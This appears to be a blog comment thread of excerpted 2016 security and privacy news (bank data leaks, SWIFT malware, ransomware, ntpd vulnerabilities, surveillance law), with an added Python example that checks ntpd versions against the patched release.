    Dossier-building third party probably dumped the data
    http://www.theregister.co.uk/2016/04/27/qatari_hack_bank_investigating_leak/

    After yesterday’s allegations of a file leak, the Qatar National Bank has issued a neither-confirm-nor-deny statement about the data dump.

    As El Reg reported yesterday, a zipfile appeared, disappeared and re-appeared on Cryptome.org, leaving claims that it contains personal data of the bank’s customers in its wake.

    The bank’s statement says it’s not going to “comment on reports circulated via social media

    Doha News reports that the leaked files (the 500 MB-plus zipfile is still online at Cryptome) mostly recorded details of Al Jazeera staff.

    However, other folders in the dump include information purporting to be about members of the Qatari royal family, the police, government employees, defence and police, “spies”, and Qatar’s intelligence service, Mukhabarat.

  34. Tomi Engdahl says:

    Kaspersky cracks CryptXXX, throws lifeline to ransomware victims
    Nasty bug tries to confuse you by going slow on external storage encryption
    http://www.theregister.co.uk/2016/04/27/cryptxxx_cracked/

  35. Tomi Engdahl says:

    News & Analysis
    IoT Security Spending to Skyrocket
    http://www.eetimes.com/document.asp?doc_id=1329533&

    Global enterprises and consumers will pump nearly $350 million into securing the Internet of Things (IoT) this year, a figure that is set to grow exponentially in coming years as networks of connected objects expand, according to market research firm Gartner Inc.

    According to Gartner’s latest forecast, IoT security spending is set to nearly double between 2014 and 2018, growing from about $232 million to nearly $550 million. The market research firm predicts that IoT security spending growth will pick up significantly after 2020, as improved skills, organizational change and more scalable service options improve execution.

    “The market for IoT security products is currently small but it is growing as both consumers and businesses start using connected devices in ever greater numbers,” said Ruggero Contu, a Gartner research director, in a statement.

    Gartner projects that there will be 6.4 billion connected devices in use worldwide this year, up 30% from last year. The firm estimates that there will be some 11.4 billion connected devices by 2018.

    “However, considerable variation exists among different industry sectors as a result of different levels of prioritization and security awareness,” Contu said.

    Much of the attention focused on IoT security vulnerabilities to date has focused on vehicles and other large equipment that, if compromised, could have the potential to cause significant damage, injury and loss of life.

    According to Gartner’s forecast, by 2020 more than 25% of identified security attacks in enterprises will involve IoT. However, the firm projects that IoT will still account for less than 10% of IT security budgets.

  36. Tomi Engdahl says:

    Exclusive: SWIFT warns customers of multiple cyber fraud cases
    http://uk.reuters.com/article/us-cyber-banking-swift-exclusive-idUKKCN0XM2DI

    SWIFT, the global financial network that banks use to transfer billions of dollars every day, warned its customers on Monday that it was aware of “a number of recent cyber incidents” where attackers had sent fraudulent messages over its system.

    The disclosure came as law enforcement authorities in Bangladesh and elsewhere investigated the February cyber theft of $81 million from the Bangladesh central bank account at the New York Federal Reserve Bank. SWIFT has acknowledged that the scheme involved altering SWIFT software on Bangladesh Bank’s computers to hide evidence of fraudulent transfers.

  37. Tomi Engdahl says:

    Bangladesh Bank hackers compromised SWIFT software, warning issued
    http://www.reuters.com/article/us-usa-nyfed-bangladesh-malware-exclusiv-idUSKCN0XM0DR

    The attackers who stole $81 million from the Bangladesh central bank probably hacked into software from the SWIFT financial platform that is at the heart of the global financial system, said security researchers at British defense contractor BAE Systems.

    SWIFT, a cooperative owned by 3,000 financial institutions, confirmed to Reuters that it was aware of malware targeting its client software. Its spokeswoman Natasha Deteran said SWIFT on Monday released a software update to thwart the malware, along with a special warning for financial institutions to scrutinize their security procedures.

  38. Tomi Engdahl says:

    Revenge pornography victims as young as 11, investigation finds
    http://www.bbc.com/news/uk-england-36054273

    Children as young as 11 are among more than 1,000 alleged victims of revenge porn who reported offences in the first year of the new law coming into effect, it has been revealed.

    In April 2015, it became an offence to share private sexual photographs or films without the subject’s consent.

    Revenge porn refers to the act of a partner or ex-partner purposefully distributing images or videos of a sexual nature without the other person’s consent.

  39. Tomi Engdahl says:

    India will require physical panic buttons on all mobile phones to prevent violence against women
    http://techcrunch.com/2016/04/27/india-panic-button/?ncid=rss&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29

    In a bid to prevent crimes against women, all mobile phones sold in India will be required to have a physical panic button installed by the beginning of next year. Department of Telecommunications minister Ravi Shankar Prasad said on Twitter that the new rule will go into effect in January 2017. When pressed, the panic button will send an alert to police and people chosen by the phone’s user.

  40. Tomi Engdahl says:

    Edward Snowden’s serious warning to Finland: you are enacting an unnecessary and expensive law

    Edward Snowden visited Finland, though only through a video link. Speaking at the ICTExpo event, Snowden commented on the proposed new intelligence law. Snowden initially amused the audience by greeting the Finns over the video link with a “Good morning”.

    In the very first interview, Snowden took a position on the intelligence act, currently a hot potato in Finland. In the original proposal, the law is designed to monitor “cross-border Internet traffic”. Snowden believes that the construction of such a system is a step towards monitoring internal traffic, as the technical leap is easy. Although the original intention of the law may be good, it is likely to lead to a useless and costly monitoring organization.

    Snowden compared the Finnish state budget with the failure of American spying on its own citizens. The NSA’s annual budget is 10 billion a year, the civilian intelligence budget is 53 billion, and including military intelligence, all United States intelligence costs $75 billion a year.

    Although this surveillance has been carried out for 10 years with these giant budgets, studies have shown that not even a single terrorist attack has been prevented.

    Snowden believes that the current system, in which the computers of suspected terrorists can be hacked into and their encryption keys stolen, is functional. Then the surveillance measures are aimed only at suspected terrorists, not ordinary citizens.

    Source: http://www.tivi.fi/Kaikki_uutiset/edward-snowdenilta-vakava-varoitus-suomelle-olette-saatamassa-turhan-ja-kalliin-lain-6545332

  41. Tomi Engdahl says:

    VPN User Arrested
    http://fried.com/news/vpn-user-arrested/

    After an investigation into a ‘disgraced judge’ in the USA, said judge was arrested after his online activity was successfully traced back to his personal IP address (and thus location/identity).

    Yes, it looks like UK-based VPN provider HideMyAss has again proven that it does not offer truly great “privacy protection” to its users. Just as the VPN service did 4 years ago, it has once again shared usage logs and personal information of a paying user to authorities.

    Although HideMyAss responded to their sharing of a user’s data and information back in 2011 by saying that it’s “naive” to think that just by using a VPN service you are free to perform illegal activities “without any consequences” — having a consistent, high level of privacy protection is exactly the reason 99% of VPN users choose to pay and use the software in the first place.

    Thankfully there are many VPN service providers that perform just as well as HideMyAss (if not better), that actually do care about giving their users as much privacy protection as possible by keeping zero logs. Some such providers are ExpressVPN, Buffered and TotalVPN.

  42. Tomi Engdahl says:

    Email privacy bill unanimously passes U.S. House
    http://www.reuters.com/article/us-usa-congress-email-idUSKCN0XO1J7

    The U.S. House of Representatives voted unanimously on Wednesday to require law enforcement authorities to get a search warrant before asking technology companies to hand over old emails.

    The bill’s prospects in the Senate remain unclear, though the 419-0 vote in the House was likely to put pressure on the upper chamber to approve it.

    Under the Email Privacy Act, which updates a decades-old law, authorities would have to get a warrant to access emails or other digital communications more than 180 days old. At present, agencies such as the U.S. Justice Department and the Securities and Exchange Commission only need a subpoena to seek such data from a service provider.

    The issue of law enforcement access to private electronic communications has been at the center of an international debate.

  43. Tomi Engdahl says:

    Time for a patch: six vulns fixed in NTP daemon
    What’s the time? It’s time to get ill. Unless you fix these beastly flaws

    http://www.theregister.co.uk/2016/04/28/time_for_a_patch_six_vulns_fixed_in_ntp_daemon/

    Cisco has turned over a bunch of Network Time Protocol daemon (ntpd) vulnerabilities to the Linux Foundation’s Core Infrastructure Initiative.
    The vulnerabilities, discovered during its ongoing ntpd evaluation, “allow attackers to craft UDP packets to either cause a denial of service condition or to prevent the correct time being set”, Cisco’s Talos Security Intelligence and Research Group

    CVE-2016-1550, described as an NTP authentication potential timing vulnerability

    CVE-2016-1551, an NTP refclock impersonation vulnerability, is less serious.

    CVE-2016-1549 is an NTP ephemeral association sybil vulnerability

    CVE-2016-1547, “demobilization of preemptible associations”, is a denial-of-service vulnerability.

    CVE-2016-1548 “Xleave pivot: NTP basic mode to interleaved”.

    The vulnerabilities have been fixed in NTP version 4.2.8p7 (http://ntp.org/downloads.html).

    Vulnerability Spotlight: Further NTPD Vulnerabilities
    http://blog.talosintel.com/2016/04/vulnerability-spotlight-further-ntpd_27.html#more

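    The comment above names 4.2.8p7 as the ntpd release that carries the fixes. A defender’s first question is which hosts are still below that release, and ntpd’s “4.2.8p7”-style version strings do not sort correctly as plain text (4.2.8p10 is newer than 4.2.8p7). The following is an added example, not code from the article, Cisco Talos or the NTP project: it parses the version string, compares it numerically against 4.2.8p7, and flags hosts that need the update. The `ntpd --version` output format and the host inventory are assumptions constructed for the example.

```python
import re

# Release the article names as carrying the fixes for the six ntpd CVEs.
FIXED_VERSION = (4, 2, 8, 7)   # 4.2.8p7

# ntp.org version strings look like "4.2.8p7" (stable) or "4.2.7p481" (dev);
# the "pN" patch level is optional.  Assumed format, not taken from the article.
_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)(?:p(\d+))?\b")


def parse_ntp_version(text):
    """Return (major, minor, patch, plevel) parsed from an ntpd version string
    such as the first line of `ntpd --version`, or None if none is found.
    A release without a 'pN' suffix is given plevel 0."""
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_patched(text, fixed=FIXED_VERSION):
    """True when the version in `text` is 4.2.8p7 or later.
    Unparseable input counts as unpatched so that the host gets looked at."""
    version = parse_ntp_version(text)
    return version is not None and version >= fixed


def unpatched_hosts(inventory, fixed=FIXED_VERSION):
    """Given {hostname: version-string}, return the sorted hostnames still
    running an ntpd older than the fixed release (or reporting no version)."""
    return sorted(host for host, text in inventory.items()
                  if not is_patched(text, fixed))


# Constructed sample inventory; host names and version strings are made up.
SAMPLE_INVENTORY = {
    "ntp1.example.test": "ntpd 4.2.8p7@1.3265-o Tue Apr 26 2016",
    "ntp2.example.test": "ntpd 4.2.8p6@1.3265-o Wed Jan 20 2016",
    "ntp3.example.test": "ntpd 4.2.6p5@1.2349-o Sat Nov 23 2013",
    "ntp4.example.test": "ntpd 4.2.8p10@1.3728-o",   # newer than p7 despite sorting before it as text
    "ntp5.example.test": "",                          # no version reported: treat as unpatched
}

if __name__ == "__main__":
    for host in unpatched_hosts(SAMPLE_INVENTORY):
        print("needs ntpd 4.2.8p7 or later:", host, repr(SAMPLE_INVENTORY[host]))
```

    The tuple comparison is the point: a text sort would put 4.2.8p10 before 4.2.8p7 and wrongly flag an up-to-date host, while a host that returns nothing is deliberately reported rather than silently skipped.
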
  44. Tomi Engdahl says:

    Child Porn Suspect Jailed Indefinitely For Refusing To Decrypt Hard Drives
    https://yro.slashdot.org/story/16/04/27/2357253/child-porn-suspect-jailed-indefinitely-for-refusing-to-decrypt-hard-drives

    A Philadelphia man suspected of possessing child pornography has been in jail for seven months and counting after being found in contempt of a court order demanding that he decrypt two password-protected hard drives. The suspect, a former Philadelphia Police Department sergeant, has not been charged with any child porn crimes. Instead, he remains indefinitely imprisoned in Philadelphia’s Federal Detention Center for refusing to unlock two drives encrypted with Apple’s FileVault software in a case that once again highlights the extent to which the authorities are going to crack encrypted devices.

    Child porn suspect jailed indefinitely for refusing to decrypt hard drives
    Man to remain locked up “until such time that he fully complies” with court order.
    http://arstechnica.com/tech-policy/2016/04/child-porn-suspect-jailed-for-7-months-for-refusing-to-decrypt-hard-drives/

    The suspect’s attorney, Federal Public Defender Keith Donoghue, urged a federal appeals court on Tuesday to release his client immediately, pending the outcome of appeals. “Not only is he presently being held without charges, but he has never in his life been charged with a crime,

    The government successfully cited a 1789 law known as the All Writs Act to compel (PDF) the suspect to decrypt two hard drives it believes contain child pornography. The All Writs Act was the same law the Justice Department asserted in its legal battle with Apple, in which a magistrate ordered the gadget maker to write code to assist the authorities in unlocking the iPhone used by one of two shooters who killed 14 people at a San Bernardino County government building in December. The authorities dropped that case after they paid a reported $1 million for a hack.

  45. Tomi Engdahl says:

    Dustin Volz / Reuters:
    Supreme Court approves change that will allow US judges to issue search warrants for computers located in any jurisdiction

    U.S. high court approves rule change to expand FBI hacking power
    http://www.reuters.com/article/us-usa-cyber-warrants-highcourt-idUSKCN0XP2XU

    The Supreme Court on Thursday approved a rule change that would let U.S. judges issue search warrants for access to computers located in any jurisdiction despite opposition from civil liberties groups who say it will greatly expand the FBI’s hacking authority.

    Magistrate judges normally can order searches only within the jurisdiction of their court, which is typically limited to a few counties.

    The U.S. Justice Department, which has pushed for the rule change since 2013, has described it as a minor modification needed to modernize the criminal code for the digital age, and has said it would not permit searches or seizures that are not already legal.

    could run afoul of the U.S. Constitution’s protections against unreasonable searches and seizures.

  46. Tomi Engdahl says:

    Linux infosec outfit does a Torvalds, rageblocks innocent vuln spotter
    Handbags at dawn: Firm reacts badly to Twitter tip-off, minor catfight ensues
    http://www.theregister.co.uk/2016/04/27/linux_security_bug_report_row/

    An open source security firm has blocked a security researcher who reported flaws in a recently issued patch in an apparent fit of pique.

    Hector Martin took to Twitter on Tuesday to note a trivial crashing vulnerability in a recently issued patch by Grsecurity.

    “I literally crashed my box by pasting a bunch of text into a terminal, due to a really sad bug in the patch,” Martin said.

  47. Tomi Engdahl says:

    Toy Maker Maisto Unwittingly Serves Up CryptXXX Ransomware
    https://blog.malwarebytes.org/threat-analysis/2016/04/toy-maker-maisto-unwittingly-serves-up-cryptxxx-ransomware/

    The website of popular American brand Maisto, known for miniature and radio-controlled toy vehicles, was caught pushing the Angler exploit kit eventually leading to ransomware infections.

    According to website security company Sucuri, maisto[.]com is running on a Microsoft IIS server and showing an outdated version of the Joomla Content Management System, therefore exposing itself to automated hacks.

    Malicious code was injected directly into the homepage and bears the same pattern as the pseudo-darkleech campaign, also discovered by Sucuri.

    Safety 101: Virus-fighting utilities
    Tool for decrypting files affected by Trojan-Ransom.Win32.Rannoh infection
    https://support.kaspersky.com/viruses/disinfection/8547#block1

  48. Tomi Engdahl says:

    The 7ev3n-HONE$T ransomware encrypts and renames your files to R5A
    http://www.bleepingcomputer.com/news/security/the-7ev3n-honest-ransomware-encrypts-and-renames-your-files-to-r5a/

    A security researcher named Mosh has discovered a new variant of the 7ev3n Ransomware, which has rebranded itself as 7ev3n-HONE$T. This ransomware will encrypt your data and then ransom your files for approximately $400 USD in bitcoins. It is currently unknown how it is being distributed or what encryption type it uses. Unfortunately, there is no way to decrypt the files for free at this time.

    7ev3n ransomware alters name, asks for much lower ransom
    https://www.grahamcluley.com/2016/04/7ev3n-ransomware-alters-asks-lower-ransom/

    Security researchers originally detected the 7ev3n ransomware back in January of this year.

    Though it hasn’t been around for long, this crypto-malware sample has already made waves for several distinguishing features, such as a ransom fee of 13 Bitcoins (more than US $5,000)

    There is still very little known about the new variant. For instance, while Mosh has confirmed 7ev3n-HONE$T relies on the same encryption process as that of its predecessor, it is unclear how the ransomware is distributed and whether it still installs several damaging files onto a victim’s computer.

    Neither is there mention made of why the new variant asks for a ransom fee of only one Bitcoin (approximately US $400).

  49. Tomi Engdahl says:

    Former Tor developer created malware for the FBI to hack Tor users
    http://www.dailydot.com/politics/government-contractor-tor-malware/

    How does the U.S. government beat Tor, the anonymity software used by millions of people around the world? By hiring someone with experience on the inside.

    A former Tor Project developer created malware for the Federal Bureau of Investigation that allowed agents to unmask users of the anonymity software.

    Matt Edman is a cybersecurity expert who worked as a part-time employee at Tor Project, the nonprofit that builds Tor software and maintains the network, almost a decade ago.

    Since then, he’s developed potent malware used by law enforcement to unmask Tor users. It’s been wielded in multiple investigations by federal law-enforcement and U.S. intelligence agencies in several high-profile cases.

  50. Tomi Engdahl says:

    Facial recognition service becomes a weapon against Russian porn actresses
    “FindFace” was created to find friends, but some are using it to harass women.
    http://arstechnica.co.uk/tech-policy/2016/04/facial-recognition-findface-used-against-russian-porn-actresses/

    The developers behind “FindFace,” which uses facial recognition software to match random photographs to people’s social media pages on Vkontakte, say the service is designed to facilitate making new friends. Released in February this year, FindFace started gaining popularity in March after a software engineer named Andrei Mima wrote about using the service to track down two women he photographed six years earlier on a street in St. Petersburg. (They’d asked him to take a picture of them, but he never got their contact information, so he wasn’t able to share it with them at the time.)

    From the start, FindFace has raised privacy concerns. (Even in his glowing recommendation, Mima addressed fears that the service further erodes people’s freedoms in the age of the Internet.) In early April, a young artist named Egor Tsvetkov highlighted how invasive the technology can be, photographing random passengers on the St. Petersburg subway and matching the pictures to the individuals’ Vkontakte pages using FindFace.

    “In theory,” Tsvetkov told RuNet Echo, “this service could be used by a serial killer or a collector trying to hunt down a debtor.”

    Hoping to raise concerns about the potential misuses of FindFace, Tsvetkov seems to have inspired a particularly nasty effort to identify and harass Russian women who appear in pornography.

    The Internet users behind the doxing campaign say their motivation is moral outrage, claiming that women in the sex industry are “corrupt and deceptive.”
